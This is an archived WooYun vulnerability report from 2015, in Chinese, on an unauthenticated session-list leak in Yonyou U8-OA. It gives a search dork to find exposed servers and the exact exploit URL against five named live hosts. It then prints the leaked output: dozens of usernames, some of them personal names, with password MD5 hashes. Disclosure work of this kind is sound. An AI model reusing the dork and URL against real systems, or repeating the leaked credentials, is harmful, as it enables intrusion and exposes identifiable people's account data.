当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0156663

漏洞标题:用友U8-OA泄漏敏感信息

相关厂商:用友软件

漏洞作者: 陆由乙

提交时间:2015-12-05 23:42

修复时间:2015-12-07 16:35

公开时间:2015-12-07 16:35

漏洞类型:敏感信息泄露

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-12-05: 细节已通知厂商并且等待厂商处理中
2015-12-07: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

66666666666666

详细说明:

https://g.jiuminghu.com/#newwindow=1&q=intitle:%E3%80%8A%E7%94%A8%E5%8F%8BU8-OA%E3%80%8B&btnK=+%E6%90%9C%E7%B4%A2
intitle:《用友U8-OA》
案例:
http://122.227.235.74:4389/yyoa/ext/https/getSessionList.jsp?cmd=getAll

08243 0691ACC7327440BF7163E896C8AF2C5D 10073 7199666CD6BA2D7B0B951122E1033534 10071 8133FD22F1A1B734A30C728778AF5571 10080 9D49CDF7C5477BEF154A0BB99E3040F8


http://www.lygdfyy.com.cn:8080/yyoa/ext/https/getSessionList.jsp?cmd=getAll

8040hf 06992F5CAF348F82F498BE18169A891F 8155ljm 40A5AEDC9D4DFCBED75FB21F103C87C2 5018qjy 513FF0808CE3DF5A987D7A98A576D5D6 7705lsd 5226FEDAA042CEC6926CBC16E073672E 9190lj 6BFAF8AF093C34F1326CA9B82F2E4B46 2053czy 7A04E5B18FDAEBCA57CA749042436D7C 4016dss BC4ABD45D0C412FB31A165C09AC7F795 4017wwj BDAA47AE952525A443E1A09EA2241207 9106wny D1A37305363A3EDB463EA2A7B4BC7BAD


http://222.175.187.147:8081/yyoa/ext/https/getSessionList.jsp?cmd=getAll

liuhaixia 2AAA7BB3C7E44C76398F930DB459B54D zhanglimin 685533DD376FCB3F87B2CBD196E1D5B8 liuyumei 6B5C64A7E1877F53D3BCD0778372C437 tongyongyue 75E07E08D9105EB3141143DDF37A6701 changchunhuan AAC0BB1B9B3013F56958B32761F78491 wucan B75BD2326BB6A1F181E9E35F3B59AA71 houmeiqing D104A0D63A83EFB37B4DAB152A15A726 lucunshan D918381DF9333C23E44AA08009D68986


http://222.189.156.67:8089/yyoa/ext/https/getSessionList.jsp?cmd=getAll

muyiran 0DBCD16620147212655917EA816CF51D wangdamei 1550D6259CDF1C6CCC265415DCC7F7C9


http://www.hxgroup.co:8080/yyoa/ext/https/getSessionList.jsp?cmd=getAll

HEH169 002751C7B2A3255351DA0F6715FC5918 HEX027 014826437911D58AB6D8F5B225DD250D HEC038 08205A2AE8263EFDE6AC4B6ED422BB3F HEW213 09635B0EDC6DB8E0C00BAC8B42E74209 HE2766 0BD485DBA19AD25FCFC3CB862825270A HE0578 0C897459BBEB10C3B9B5BFBC33143345 HEG010 0E2AB625290E90BDBDB4AD81ADA2D744 HEJ002 13E53DAFA8CA6565AEFC9932A55A9ACE HEC024 1A9CB21ACCAF1616295BF625DF29AAE5 HE6125 2486E8C4C33B50ADDD01B6B2BFD7BF56 HEZ071 2607F03B9BD3C5C04685AA22B83DCBC1 HE5291 2AE067973873C54247A9F73A4FB19789 HES083 30F49CCCAAB3B274E252600A515FE72F HE6880 319C8B38317D26AB47590CF3C1921F69 HEL270 3B79B7C4A35921C17BBC584612846E9F HEZ337 3EF6C3988C237E9ED1F9B16CF4756C7C HE0063 4324F92C046D6245AB0730EE7F193B24 HE0649 4C122B34CE3069A0355463F94ECFCAB7 HE0738 63733AE8BB777B0A01010BA7AD247A7F HEH111 7A472900C1A896DA354F81C33182AF0A HEL211 85B90DCE41D42ABCDD54110D8A3EE59A hlp028 8976779C492A9EB865FF3FE1696883B2 HE1768 8CC716B2D2AAC971263F6B853695D168 HEF025 8DBC87B79F5EB8A7C31E945C093B5BBB HEZ135 8DF7A2330A81C571B03C3F0FD4E18CF4 HE3658 8E9B6DEB4E135D484EC7D3FFDF8639FA HEY136 8EDEA07EE74586BBEE1EE0C15EE5DDA6 HEY096 9105846B031AAF2CDE2953BD7E067A6F HE0573 932ECA56E159D6E8B819168839186EDA HEL156 9606EA22823FAFBF818C648BEED7B519 HEY167 96BB3CE9343969522825A077E330C4BF HE0939 9909D0564E437476F18753255EFB0988 HE2807 A1223DB2C4066002D37271D609D2CD78 HE6547 A46D4289949A4F130FB7485FAB73052F HEY188 A5DBACA4369A046488934D6FE10228F4 HEC185 A6E1D3E3A7FC8FBB0FF6AC13A7911B28 HE0144 A6EE76AD008260A4F8AEDE9E0F02CFE8 HE5610 A881026E613DA7A93DA521B23020BB6A HEZ202 BAC263F66FB0683DABBAC4DBE232555F HE1906 BF67010C08A52058D665BC618798EB63 HEF022 C11174B0DEBE26B2768210B8260938A7 HEZ246 C4FC20AD76E94FA225BA27C59A30F626 HE3485 C971D3ADC5416836ED5C8D8968155017 HEX023 C99F3392467B07910B7696C7F3E3013A HEX008 CBB760E76E910B51072D53ACE5EB8A66 HLZ369 DF70DB01542F47DC3B2492CF7229ABEE HE4857 DFC80224318ACDC14B2D13A481DC2C82 HEC148 DFFF69F0B174FEECAB9650BA6CC1B1DC HEK011 E462D1E6548336273420281DDCE0ABEC HLZ019 E79424B9ECD27634A06E734CEE833DC0 HEY123 ED9F86D39909A05F728B6220FBAF8B37 HEZ084 F4ABBA41DCED6B2565510ACBF273CF66 HED069 FAF95FD069340A211E7FF83BBC1C3232 HEX134 FECCC53BC51703B9681252ECBEEE2C0A HEZ370 FFB27D682D6C8F318C09E1C88AF81414 HE5781 FFC78CA87D522C5356ABFCEB3EAF6760


5个案例泄漏的是密码md5值。

漏洞证明:

已经证明。

修复方案:

如果不是必须的文件就删除把。

版权声明:转载请注明来源 陆由乙@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-12-07 16:35

厂商回复:

非常感谢您对用友的关注,目前此产品已不在用友体系,请联系隔壁小伙伴致远协创,谢谢。--> http://www.wooyun.org/corps/%E5%8C%97%E4%BA%AC%E8%87%B4%E8%BF%9C%E5%8D%8F%E5%88%9B%E8%BD%AF%E4%BB%B6%E6%9C%89%E9%99%90%E5%85%AC%E5%8F%B8

最新状态:

暂无